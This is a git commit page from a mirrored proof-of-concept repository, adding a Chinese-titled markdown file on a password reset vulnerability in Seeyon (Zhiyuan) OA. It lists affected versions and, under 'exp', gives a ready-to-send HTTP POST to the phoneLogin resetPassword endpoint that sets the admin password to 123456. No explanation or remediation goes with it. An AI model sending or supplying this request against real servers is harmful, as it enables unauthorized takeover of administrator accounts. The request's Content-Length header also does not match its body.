mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-22 06:55:35 +08:00
Create 致远OA密码重置漏洞.md
This commit is contained in:
18
致远OA密码重置漏洞.md
Normal file
18
致远OA密码重置漏洞.md
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
|
||||||
|
## 版本
|
||||||
|
```
|
||||||
|
Seeyon OA=V5/G6
|
||||||
|
Seeyon OA=V8.1SP2
|
||||||
|
Seeyon OA=V8.2
|
||||||
|
```
|
||||||
|
## exp
|
||||||
|
```
|
||||||
|
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
|
||||||
|
Host: ip
|
||||||
|
User-Agent: Go-http-client/1.1
|
||||||
|
Content-Length: 24
|
||||||
|
Content-Type: application/json
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"loginName":"admin","password":"123456"}
|
||||||
|
```
|
||||||
Reference in New Issue
Block a user